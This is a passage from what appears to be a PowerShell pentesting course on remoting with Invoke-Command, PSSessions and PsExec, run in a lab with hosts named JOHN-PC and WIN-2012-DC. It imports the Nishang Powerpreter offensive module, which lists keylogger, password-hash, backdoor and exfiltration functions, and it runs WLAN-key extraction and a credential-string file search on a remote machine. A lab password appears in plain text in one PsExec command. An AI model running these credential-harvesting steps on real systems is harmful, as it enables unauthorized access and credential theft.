] [-ArgumentList ] [-AsJob] [-Authentication ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-Port ] [-SessionName ] [-SessionOption ] [-ThrottleLimit ] [-UseSSL] [] Invoke-Command [[-ComputerName] ] [-ScriptBlock] [-ApplicationName ] [-ArgumentList ] [-AsJob] [-Authentication ] [-CertificateThumbprint ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-Port ] [-SessionName ] [-SessionOption ] [-ThrottleLimit ] [-UseSSL] [] Invoke-Command [[-Session] ] [-FilePath] [-ArgumentList ] [-AsJob] [-HideComputerName] [-InputObject ] [-JobName ] [-ThrottleLimit ] [] Invoke-Command [[-Session] ] [-ScriptBlock] [-ArgumentList ] [-AsJob] [-HideComputerName] [-InputObject ] [-JobName ] [-ThrottleLimit ] [] DESCRIPTION The Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. With a single Invoke-Command command, you can run commands on multiple computers. To run a single command on a remote computer, use the ComputerName parameter. To run a series of related commands that share data, use the New-PSSession cmdlet to create a PSSession (a persistent connection) on the remote computer, and then use the Session parameter of Invoke-Command to run the command in the PSSession. To run a command in a disconnected session, use the InDisconnectedSession parameter. To run a command in a background job, use the AsJob parameter. You can also use Invoke-Command on a local computer to evaluate or run a string in a script block as a command. Windows PowerShell converts the script block to a command and runs the command immediately in the current scope, instead of just echoing the string at the command line. To start an interactive session with a remote computer, use the Enter-PSSession cmdlet. To establish a persistent connection to a remote computer, use the New-PSSession cmdlet. Before using Invoke-Command to run commands on a remote computer, read about_Remote (http://go.microsoft.com/fwlink/?LinkID=135182). RELATED LINKS Online Version: http://go.microsoft.com/fwlink/p/?linkid=289592 Enter-PSSession Exit-PSSession Get-PSSession Invoke-Item New-PSSession Remove-PSSession WSMan Provider about_PSSessions about_Remote about_Remote_Disconnected_Sessions about_Remote_Variables about_Scopes REMARKS To see the examples, type: "get-help Invoke-Command -examples". For more information, type: "get-help Invoke-Command -detailed". For technical information, type: "get-help Invoke-Command -full". For online help, type: "get-help Invoke-Command -online" PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Help Invoke-Command -ShowWindow ``` ![Image of ShowWindow](images/2.jpeg) ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {$env:COMPUTERNAME} -ComputerName JOHN-PC -Credential John-PC\John JOHN-PC PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {Get-Process} -ComputerName JOHN-PC -Credential John-PC\John Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName ------- ------ ----- ----- ----- ------ -- ----------- -------------- 23 2 1756 2156 30 0.00 1288 cmd JOHN-PC 40 3 708 3240 42 0.04 1220 conhost JOHN-PC 39 3 1448 4024 43 0.05 2496 conhost JOHN-PC 402 5 1112 2504 33 0.09 352 csrss JOHN-PC 181 6 1092 3592 32 0.26 408 csrss JOHN-PC 79 3 852 3156 20 0.03 3256 dllhost JOHN-PC 66 3 892 3260 38 0.02 912 dwm JOHN-PC 664 21 17020 26036 166 0.79 696 explorer JOHN-PC 0 0 0 12 0 0 Idle JOHN-PC 728 12 2864 7396 32 0.59 492 lsass JOHN-PC 195 5 1604 3744 23 0.05 500 lsm JOHN-PC 56 3 804 4056 57 0.05 3160 notepad JOHN-PC 501 12 23192 35896 165 0.49 2476 powershell JOHN-PC 134 5 6272 9764 63 0.12 2924 python JOHN-PC 609 15 16336 10160 83 0.31 1664 SearchIndexer JOHN-PC 185 7 3788 5588 34 0.62 476 services JOHN-PC 29 1 216 572 4 0.06 272 smss JOHN-PC 282 9 4356 5960 58 0.02 1356 spoolsv JOHN-PC 347 7 2436 5236 34 0.26 624 svchost JOHN-PC 261 8 2104 4396 26 0.22 736 svchost JOHN-PC 546 13 14104 11804 77 0.31 788 svchost JOHN-PC 523 13 21164 26988 99 1.93 872 svchost JOHN-PC 1069 27 13456 22276 102 1.15 960 svchost JOHN-PC 472 17 5964 9996 55 0.32 1124 svchost JOHN-PC 683 25 11148 11708 79 0.29 1232 svchost JOHN-PC 305 24 10576 9060 48 0.45 1392 svchost JOHN-PC 349 15 4768 9200 66 0.14 1500 svchost JOHN-PC 372 36 147480 18128 213 10.30 1956 svchost JOHN-PC 347 13 7864 9624 64 0.35 2772 svchost JOHN-PC 548 0 44 548 2 4 System JOHN-PC 138 8 1972 4452 38 0.05 1292 taskhost JOHN-PC 115 5 1436 3420 44 0.07 684 VBoxService JOHN-PC 138 5 1236 4392 61 0.03 2104 VBoxTray JOHN-PC 74 5 780 2748 32 0.23 400 wininit JOHN-PC 113 4 1492 3740 39 0.27 448 winlogon JOHN-PC 414 15 7332 4444 107 0.29 556 wmpnetwk JOHN-PC 210 10 27708 35636 139 1.03 2640 wsmprovhost JOHN-PC PS C:\Users\Administrator> ``` ================================================ FILE: 22-Powershell-Remoting-Part-3.md ================================================ #### 22. Powershell Remoting Part 3 ###### PowerShell Remoting – One-to-One - Interactive Session - ```PSSession``` - Runs in a new process ```(wsmprovhost)``` - Is Stateful - Using PSSessions - Initiating - Interacting - Closing - ```PowerShell Version``` ```PowerShell PS C:\Users\Administrator> $PSVersionTable Name Value ---- ----- PSVersion 4.0 WSManStackVersion 3.0 SerializationVersion 1.1.0.1 CLRVersion 4.0.30319.34014 BuildVersion 6.3.9600.16394 PSCompatibleVersions {1.0, 2.0, 3.0, 4.0} PSRemotingProtocolVersion 2.2 PS C:\Users\Administrator> ``` - Help on ```session``` ```PowerShell PS C:\Users\Administrator> help *session* Set-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Changes the properties of a registered session configuration. Enable-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Enables the session configurations on the local computer. Disable-PSSessionConfiguration Cmdlet Microsoft.PowerShell.Core Disables session configurations on the local computer. New-PSSession Cmdlet Microsoft.PowerShell.Core Creates a persistent connection to a local or remote computer. Disconnect-PSSession Cmdlet Microsoft.PowerShell.Core Disconnects from a session. Connect-PSSession Cmdlet Microsoft.PowerShell.Core Reconnects to disconnected sessions Receive-PSSession Cmdlet Microsoft.PowerShell.Core Gets results of commands in disconnected sessions Get-PSSession Cmdlet Microsoft.PowerShell.Core Gets the Windows PowerShell sessions on local and remote computers. Remove-PSSession Cmdlet Microsoft.PowerShell.Core Closes one or more Windows PowerShell sessions (PSSessions). Enter-PSSession Cmdlet Microsoft.PowerShell.Core Starts an interactive session with a remote computer. Exit-PSSession Cmdlet Microsoft.PowerShell.Core Ends an interactive session with a remote computer. New-PSSessionOption Cmdlet Microsoft.PowerShell.Core Creates an object that contains advanced options for a PSSession. New-PSSessionConfigurationFile Cmdlet Microsoft.PowerShell.Core Creates a file that defines a session configuration. Test-PSSessionConfigurationFile Cmdlet Microsoft.PowerShell.Core Verifies the keys and values in a session configuration file. Export-PSSession Cmdlet Microsoft.PowerShell.U... Imports commands from another session and saves them in a Windows PowerShell module. Import-PSSession Cmdlet Microsoft.PowerShell.U... Imports commands from another session into the current session. Get-CimSession Cmdlet CimCmdlets Get-CimSession... New-CimSession Cmdlet CimCmdlets New-CimSession... New-CimSessionOption Cmdlet CimCmdlets New-CimSessionOption... Remove-CimSession Cmdlet CimCmdlets Remove-CimSession... Get-IscsiSession Function iSCSI ... Register-IscsiSession Function iSCSI ... Unregister-IscsiSession Function iSCSI ... New-WSManSessionOption Cmdlet Microsoft.WSMan.Manage... Creates a WS-Management session option hash table to use as input parameters to the following WS-Management cmdlets: Get-WSManIns... Get-DtcTransactionsTraceSession Function MsDtc ... Set-DtcTransactionsTraceSession Function MsDtc ... Start-DtcTransactionsTraceSession Function MsDtc ... Stop-DtcTransactionsTraceSession Function MsDtc ... Write-DtcTransactionsTraceSession Function MsDtc ... New-NetEventSession Function NetEventPacketCapture ... Remove-NetEventSession Function NetEventPacketCapture ... Get-NetEventSession Function NetEventPacketCapture ... Set-NetEventSession Function NetEventPacketCapture ... Start-NetEventSession Function NetEventPacketCapture ... Stop-NetEventSession Function NetEventPacketCapture ... Get-NetNatSession Function NetNat ... Disconnect-NfsSession Function NFS ... Get-NfsSession Function NFS ... New-PSWorkflowSession Function PSWorkflow ... New-RDSessionDeployment Function RemoteDesktop ... Get-RDSessionCollection Function RemoteDesktop ... Remove-RDSessionCollection Function RemoteDesktop ... New-RDSessionCollection Function RemoteDesktop ... Get-RDSessionHost Function RemoteDesktop ... Set-RDSessionHost Function RemoteDesktop ... Remove-RDSessionHost Function RemoteDesktop ... Add-RDSessionHost Function RemoteDesktop ... Get-RDSessionCollectionConfigu... Function RemoteDesktop ... Set-RDSessionCollectionConfigu... Function RemoteDesktop ... Get-RDUserSession Function RemoteDesktop ... Get-SmbSession Function SmbShare ... Close-SmbSession Function SmbShare ... New-TlsSessionTicketKey Cmdlet TLS New-TlsSessionTicketKey... Enable-TlsSessionTicketKey Cmdlet TLS Enable-TlsSessionTicketKey... Disable-TlsSessionTicketKey Cmdlet TLS Disable-TlsSessionTicketKey... Export-TlsSessionTicketKey Cmdlet TLS Export-TlsSessionTicketKey... about_PSSessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to about_PSSession_Details HelpFile Provides detailed information about Windows PowerShell sessions and the about_Remote_Disconnected_Sess... HelpFile Explains how to disconnect from and reconnect to a PSSession about_Session_Configurations HelpFile Describes session configurations, which determine the users who can about_Session_Configuration_Files HelpFile Describes session configuration files, which can be used in a about_CimSession HelpFile Describes a CimSession object and the difference between CIM sessions and PS C:\Users\Administrator> ``` - In ```Local Machine``` ```PowerShell PS C:\Users\Administrator> $env:COMPUTERNAME WIN-2012-DC PS C:\Users\Administrator> $env:USERDOMAIN PFPT PS C:\Users\Administrator> $env:USERNAME Administrator PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Enable-PSRemoting -Force WinRM is already set up to receive requests on this computer. WinRM is already set up for remote management on this computer. PS C:\Users\Administrator> ``` - In ```Remote Machine``` ```PowerShell PS C:\Windows\system32> $env:COMPUTERNAME JOHN-PC PS C:\Windows\system32> $env:USERDOMAIN John-PC PS C:\Windows\system32> $env:USERNAME John PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Enable-PSRemoting -Force WinRM already is set up to receive requests on this machine. WinRM already is set up for remote management on this machine. PS C:\Windows\system32> ``` - ```New-PSSession``` ```PowerShell PS C:\Users\Administrator> New-PSSession -ComputerName JOHN-PC -Credential John-PC\John Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 1 Session1 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator> ``` - ```Get-PSSession``` ```PowerShell PS C:\Users\Administrator> Get-PSSession Id Name ComputerName State ConfigurationName Availability -- ---- ------------ ----- ----------------- ------------ 1 Session1 JOHN-PC Opened Microsoft.PowerShell Available PS C:\Users\Administrator> ``` - ```Enter-PSSession``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\John [JOHN-PC]: PS C:\Users\John\Documents> $env:COMPUTERNAME JOHN-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERDOMAIN John-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERNAME John [JOHN-PC]: PS C:\Users\John\Documents> ``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -Id 1 [JOHN-PC]: PS C:\Users\John\Documents> whoami john-pc\john [JOHN-PC]: PS C:\Users\John\Documents> $env:COMPUTERNAME JOHN-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERDOMAIN John-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERNAME John [JOHN-PC]: PS C:\Users\John\Documents> Get-Process Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 23 2 1756 2156 30 0.00 1288 cmd 40 3 708 3192 42 0.04 1220 conhost 39 3 1468 4036 43 0.06 2496 conhost 415 5 1112 2404 33 0.09 352 csrss 214 6 1196 3600 32 0.40 408 csrss 76 3 892 3544 32 0.03 3672 dllhost 66 3 892 3252 38 0.02 912 dwm 821 25 25344 38764 219 2.81 696 explorer 0 0 0 12 0 0 Idle 741 13 3040 7516 32 0.76 492 lsass 196 5 1604 3608 23 0.06 500 lsm 56 3 868 4248 57 0.06 3160 notepad 501 12 23172 33576 165 0.49 2476 powershell 134 5 6272 9764 63 0.12 2924 python 626 15 18692 10972 85 0.45 1664 SearchIndexer 193 7 4100 5844 35 0.65 476 services 29 1 216 548 4 0.06 272 smss 280 9 4312 5884 57 0.02 1356 spoolsv 350 7 2868 5940 35 0.30 624 svchost 267 8 2168 4848 26 0.24 736 svchost 548 13 14856 12548 77 0.36 788 svchost 512 12 22584 27856 99 2.41 872 svchost 1150 30 14364 22076 106 1.62 960 svchost 456 17 5932 9784 55 0.36 1124 svchost 690 26 11620 10904 79 0.40 1232 svchost 305 24 9636 9264 48 0.53 1392 svchost 359 15 4960 8800 67 0.15 1500 svchost 356 36 144368 18092 210 10.70 1956 svchost 349 13 8020 9796 64 0.53 2772 svchost 96 7 1056 3856 25 0.03 3816 svchost 568 0 44 552 2 4 System 138 8 1972 4428 38 0.05 1292 taskhost 117 5 1524 3460 44 0.10 684 VBoxService 140 5 1236 4400 61 0.03 2104 VBoxTray 74 5 780 2620 32 0.23 400 wininit 113 4 1492 3620 39 0.27 448 winlogon 452 16 7468 7376 108 0.32 556 wmpnetwk 283 11 41784 51948 161 1.04 3768 wsmprovhost [JOHN-PC]: PS C:\Users\John\Documents> exit PS C:\Users\Administrator> ``` - ```Remove-PSSession``` ```PowerShell PS C:\Users\Administrator> Remove-PSSession -id 1 ``` ```PowerShell PS C:\Users\Administrator> Get-PSSession ``` ###### Exercise - Try connecting a PS Session to a VM. - Refer above for - ```New-PSSession```, ```Get-PSSession```, ```Enter-PSSession```, ```Remove-PSSession``` - Compare ```Enter-PSSession``` to ```PsExec```. [Think over pros and cons.](https://4sysops.com/archives/psexec-vs-the-powershell-remoting-cmdlets-invoke-command-and-enter-pssession/#psexec-vs-powershell-remoting) - Which one do you find easier to use as an attacker? - What are the detection rates? - ```Enter-PSSession``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\John [JOHN-PC]: PS C:\Users\John\Documents> $env:COMPUTERNAME JOHN-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERDOMAIN John-PC [JOHN-PC]: PS C:\Users\John\Documents> $env:USERNAME John [JOHN-PC]: PS C:\Users\John\Documents> ``` - ```PsExec``` ```Remote Machine``` ```PowerShell PS C:\Windows\system32> $env:COMPUTERNAME JOHN-PC PS C:\Windows\system32> $env:USERDOMAIN John-PC PS C:\Windows\system32> $env:USERNAME John PS C:\Windows\system32> ``` ```PowerShell PS C:\Users\Administrator\Desktop\SysinternalsSuite> .\PsExec.exe \\JOHN-PC -u John-PC\John cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Password: Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : hsd1.ca.comcast.net IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87::c308 IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87:613e:76ef:5029:c2c1 Temporary IPv6 Address. . . . . . : 2601:644:8501:6c87:bc3b:5ba5:fa78:5474 Link-local IPv6 Address . . . . . : fe80::613e:76ef:5029:c2c1%11 IPv4 Address. . . . . . . . . . . : 10.0.0.129 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:f1ff:fe80:0%11 10.0.0.1 Tunnel adapter isatap.hsd1.ca.comcast.net: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : hsd1.ca.comcast.net Tunnel adapter Local Area Connection* 11: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : 2001:0:9d38:90d7:2013:2547:b6b9:5698 Link-local IPv6 Address . . . . . : fe80::2013:2547:b6b9:5698%13 Default Gateway . . . . . . . . . : C:\Windows\system32> ``` ```PowerShell PS C:\Users\Administrator\Desktop\SysinternalsSuite> .\PsExec.exe \\JOHN-PC -u John-PC\John -p Ab12345 cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : hsd1.ca.comcast.net IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87::c308 IPv6 Address. . . . . . . . . . . : 2601:644:8501:6c87:613e:76ef:5029:c2c1 Temporary IPv6 Address. . . . . . : 2601:644:8501:6c87:bc3b:5ba5:fa78:5474 Link-local IPv6 Address . . . . . : fe80::613e:76ef:5029:c2c1%11 IPv4 Address. . . . . . . . . . . : 10.0.0.129 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:f1ff:fe80:0%11 10.0.0.1 Tunnel adapter isatap.hsd1.ca.comcast.net: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : hsd1.ca.comcast.net Tunnel adapter Local Area Connection* 11: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : 2001:0:9d38:90d7:2013:2547:b6b9:5698 Link-local IPv6 Address . . . . . : fe80::2013:2547:b6b9:5698%13 Default Gateway . . . . . . . . . : C:\Windows\system32> ``` ```PowerShell PS C:\Users\Administrator\Desktop\SysinternalsSuite> .\PsExec.exe -h PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com PsExec executes a program on a remote system, where remotely executed console applications execute interactively. Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-r servicename][-h][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-][-a n,n,...] cmd [arguments] -a Separate processors on which the application can run with commas where 1 is the lowest numbered CPU. For example, to run the application on CPU 2 and CPU 4, enter: "-a 2,4" -c Copy the specified program to the remote system for execution. If you omit this option the application must be in the system path on the remote system. -d Don't wait for process to terminate (non-interactive). -e Does not load the specified account's profile. -f Copy the specified program even if the file already exists on the remote system. -i Run the program so that it interacts with the desktop of the specified session on the remote system. If no session is specified the process runs in the console session. -h If the target system is Vista or higher, has the process run with the account's elevated token, if available. -l Run process as limited user (strips the Administrators group and allows only privileges assigned to the Users group). On Windows Vista the process runs with Low Integrity. -n Specifies timeout in seconds connecting to remote computers. -p Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password. -r Specifies the name of the remote service to create or interact. with. -s Run the remote process in the System account. -u Specifies optional user name for login to remote computer. -v Copy the specified file only if it has a higher version number or is newer on than the one on the remote system. -w Set the working directory of the process (relative to remote computer). -x Display the UI on the Winlogon secure desktop (local system only). -arm Specifies the remote computer is of ARM architecture. -priority Specifies -low, -belownormal, -abovenormal, -high or -realtime to run the process at a different priority. Use -background to run at low memory and I/O priority on Vista. computer Direct PsExec to run the application on the remote computer or computers specified. If you omit the computer name PsExec runs the application on the local system, and if you specify a wildcard (\\*), PsExec runs the command on all computers in the current domain. @file PsExec will execute the command on each of the computers listed in the file. cmd Name of application to execute. arguments Arguments to pass (note that file paths must be absolute paths on the target system). -accepteula This flag suppresses the display of the license dialog. -nobanner Do not display the startup banner and copyright message. You can enclose applications that have spaces in their name with quotation marks e.g. psexec \\marklap "c:\long name app.exe". Input is only passed to the remote system when you press the enter key, and typing Ctrl-C terminates the remote process. If you omit a user name the process will run in the context of your account on the remote system, but will not have access to network resources (because it is impersonating). Specify a valid user name in the Domain\User syntax if the remote process requires access to network resources or to run in a different account. Note that the password and command is encrypted in transit to the remote system. Error codes returned by PsExec are specific to the applications you execute, not PsExec. PS C:\Users\Administrator\Desktop\SysinternalsSuite> ``` ================================================ FILE: 23-Powershell-Remoting-Part-4.md ================================================ #### 23. Powershell Remoting Part 4 ###### PowerShell Remoting – One-to-Many - ```Invoke-Command``` - Running ```Commands``` ```PowerShell PS C:\Users\Administrator> Invoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName JOHN-PC -Credential John-PC\John john-pc\john Major Minor Build Revision PSComputerName ----- ----- ----- -------- -------------- 1 0 0 0 JOHN-PC Id : 1288 Handles : 23 CPU : 0 Name : cmd PSComputerName : JOHN-PC Id : 1552 Handles : 22 CPU : 0.0100144 Name : cmd PSComputerName : JOHN-PC Id : 1220 Handles : 40 CPU : 0.050072 Name : conhost PSComputerName : JOHN-PC Id : 3124 Handles : 34 CPU : 0 Name : conhost PSComputerName : JOHN-PC Id : 352 Handles : 433 CPU : 0.100144 Name : csrss PSComputerName : JOHN-PC Id : 408 Handles : 206 CPU : 0.4706768 Name : csrss PSComputerName : JOHN-PC Id : 2920 Handles : 79 CPU : 0.0100144 Name : dllhost PSComputerName : JOHN-PC Id : 912 Handles : 66 CPU : 0.0200288 Name : dwm PSComputerName : JOHN-PC Id : 696 Handles : 786 CPU : 2.9342192 Name : explorer PSComputerName : JOHN-PC Id : 0 Handles : 0 CPU : Name : Idle PSComputerName : JOHN-PC Id : 492 Handles : 744 CPU : 0.901296 Name : lsass PSComputerName : JOHN-PC Id : 500 Handles : 196 CPU : 0.0701008 Name : lsm PSComputerName : JOHN-PC Id : 3160 Handles : 56 CPU : 0.0701008 Name : notepad PSComputerName : JOHN-PC Id : 2924 Handles : 134 CPU : 0.1301872 Name : python PSComputerName : JOHN-PC Id : 1664 Handles : 627 CPU : 0.50072 Name : SearchIndexer PSComputerName : JOHN-PC Id : 476 Handles : 199 CPU : 0.7310512 Name : services PSComputerName : JOHN-PC Id : 272 Handles : 29 CPU : 0.0600864 Name : smss PSComputerName : JOHN-PC Id : 1356 Handles : 280 CPU : 0.0200288 Name : spoolsv PSComputerName : JOHN-PC Id : 624 Handles : 354 CPU : 0.3605184 Name : svchost PSComputerName : JOHN-PC Id : 736 Handles : 267 CPU : 0.3304752 Name : svchost PSComputerName : JOHN-PC Id : 788 Handles : 550 CPU : 0.50072 Name : svchost PSComputerName : JOHN-PC Id : 872 Handles : 514 CPU : 3.50504 Name : svchost PSComputerName : JOHN-PC Id : 960 Handles : 1142 CPU : 3.5150544 Name : svchost PSComputerName : JOHN-PC Id : 1124 Handles : 452 CPU : 0.4706768 Name : svchost PSComputerName : JOHN-PC Id : 1232 Handles : 696 CPU : 0.6609504 Name : svchost PSComputerName : JOHN-PC Id : 1392 Handles : 306 CPU : 0.5708208 Name : svchost PSComputerName : JOHN-PC Id : 1500 Handles : 349 CPU : 0.200288 Name : svchost PSComputerName : JOHN-PC Id : 1956 Handles : 373 CPU : 11.3262864 Name : svchost PSComputerName : JOHN-PC Id : 2772 Handles : 344 CPU : 0.9413536 Name : svchost PSComputerName : JOHN-PC Id : 3816 Handles : 96 CPU : 0.0300432 Name : svchost PSComputerName : JOHN-PC Id : 4 Handles : 565 CPU : Name : System PSComputerName : JOHN-PC Id : 1292 Handles : 138 CPU : 0.050072 Name : taskhost PSComputerName : JOHN-PC Id : 3528 Handles : 149 CPU : 0.0600864 Name : taskhost PSComputerName : JOHN-PC Id : 684 Handles : 115 CPU : 0.25036 Name : VBoxService PSComputerName : JOHN-PC Id : 2104 Handles : 140 CPU : 0.0600864 Name : VBoxTray PSComputerName : JOHN-PC Id : 400 Handles : 74 CPU : 0.2303312 Name : wininit PSComputerName : JOHN-PC Id : 448 Handles : 113 CPU : 0.2703888 Name : winlogon PSComputerName : JOHN-PC Id : 556 Handles : 417 CPU : 0.4105904 Name : wmpnetwk PSComputerName : JOHN-PC Id : 3532 Handles : 247 CPU : 0.7711088 Name : wsmprovhost PSComputerName : JOHN-PC PS C:\Users\Administrator> ``` - Running ```Scripts``` ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -FilePath .\HelloWorld.ps1 -ComputerName JOHN-PC -Credential John-PC\John Hello World PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -FilePath .\nishang-master\Gather\Check-VM.ps1 -ComputerName JOHN-PC -Credential John-PC\John ``` - Running ```Modules``` - Import the ```Module``` ```PowerShell PS C:\Users\Administrator\Desktop> Import-Module .\nishang-master\powerpreter\Powerpreter.psm1 WARNING: The names of some imported commands from the module 'Powerpreter' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop> ``` - Check that the ```Module``` is imported ```PowerShell PS C:\Users\Administrator\Desktop> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.0.0.0 Microsoft.PowerShell.Security {ConvertFrom-SecureString, ConvertTo-SecureString, Get-Acl, Get-AuthenticodeSignature...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} Manifest 3.0.0.0 Microsoft.WSMan.Management {Connect-WSMan, Disable-WSManCredSSP, Disconnect-WSMan, Enable-WSManCredSSP...} Script 0.0 Powerpreter {Add-ScrnSaveBackdoor, Base64ToString, Check-VM, Copy-VSS...} PS C:\Users\Administrator\Desktop> ``` - List the ```Functions``` of the ```Module``` ```PowerShell PS C:\Users\Administrator\Desktop> Get-Command -Module Powerpreter CommandType Name ModuleName ----------- ---- ---------- Function Add-ScrnSaveBackdoor Powerpreter Function Base64ToString Powerpreter Function Check-VM Powerpreter Function Copy-VSS Powerpreter Function Create-MultipleSessions Powerpreter Function DNS_TXT_Pwnage Powerpreter Function Do-Exfiltration Powerpreter Function Download Powerpreter Function Download_Execute Powerpreter Function Download-Execute-PS Powerpreter Function Enable-DuplicateToken Powerpreter Function Execute-Command-MSSQL Powerpreter Function Execute-DNSTXT-Code Powerpreter Function Execute-OnTime Powerpreter Function ExetoText Powerpreter Function FireBuster Powerpreter Function FireListener Powerpreter Function Get-Information Powerpreter Function Get-LsaSecret Powerpreter Function Get-PassHashes Powerpreter Function Get-PassHints Powerpreter Function Get-Wlan-Keys Powerpreter Function Gupt-Backdoor Powerpreter Function HTTP-Backdoor Powerpreter Function Invoke-BruteForce Powerpreter Function Invoke-CredentialsPhish Powerpreter Function Invoke-Decode Powerpreter Function Invoke-Encode Powerpreter Function Invoke-NetworkRelay Powerpreter Function Invoke-PortScan Powerpreter Function Invoke-PSGcat Powerpreter Function Invoke-PsGcatAgent Powerpreter Function Invoke-PsUACme Powerpreter Function Keylogger Powerpreter Function Out-CHM Powerpreter Function Out-DnsTxt Powerpreter Function Out-Excel Powerpreter Function Out-HTA Powerpreter Function Out-Java Powerpreter Function Out-Shortcut Powerpreter Function Out-WebQuery Powerpreter Function Out-Word Powerpreter Function Persistence Powerpreter Function Pivot Powerpreter Function Remove-Persistence Powerpreter Function Remove-Update Powerpreter Function StringtoBase64 Powerpreter Function TexttoEXE Powerpreter Function Use-Session Powerpreter PS C:\Users\Administrator\Desktop> ``` - Run the ```Function``` of the ```Module``` ```PowerShell PS C:\Users\Administrator\Desktop> Invoke-Command -ScriptBlock ${Function:Get-WLAN-Keys} -ComputerName JOHN-PC -Credential John-PC\John You cannot call a method on a null-valued expression. + CategoryInfo : InvalidOperation: (Replace:String) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull + PSComputerName : JOHN-PC The Wireless AutoConfig Service (wlansvc) is not running. PS C:\Users\Administrator\Desktop> ``` - “Fan-Out” or “One-to-Many” ```PowerShell Invoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName , -Credential \Administrator ``` ```PowerShell Invoke-Command -ScriptBlock {whoami;(Get-Host).Version;Get-Process} -ComputerName {Get-Content .\servers.txt} -Credential \Administrator ``` ###### Exercise - Write a ```PowerShell``` script which searches for the presence of strings like ```“password”```, ```“username”``` and ```“credentials”``` in the ```C:\``` directory. ```Search-Sensitive.ps1``` ```PowerShell $file = Get-ChildItem -Path C:\ -Filter *.txt -Recurse Write-Output "`nFiles Found " --------------------- $file.Count Write-Output "`nScript Output " --------------------- Select-String $file -Pattern username, password, credential ``` - Run this script on remote machines. ```PowerShell PS C:\Users\Administrator> Invoke-Command -FilePath .\Desktop\Code\23\Search-Sensitive.ps1 -ComputerName JOHN-PC -Credential John-PC\John Files Found --------------------- 477 Script Output --------------------- C:\Program Files (x86)\Nmap\nselib\data\enterprise_numbers.txt:42994:43124 PasswordBox Inc. C:\Program Files (x86)\Nmap\nselib\data\http-folders.txt:563:/password/ C:\Program Files (x86)\Nmap\nselib\data\http-folders.txt:564:/passwords/ C:\Program Files (x86)\Nmap\nselib\data\rtsp-urls.txt:14:/CAM_ID.password.mp2 C:\Program Files (x86)\Nmap\nselib\data\rtsp-urls.txt:178:/user=admin_password=tlJwpbo6_channel=1_stream=0.sdp?real_stream C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:167:password.bin C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:168:password.cfg C:\Program Files (x86)\Nmap\nselib\data\tftplist.txt:169:password.ini C:\Python27\NEWS.txt:4376:- Issue #13642: Unquote before b64encoding user:password during Basic 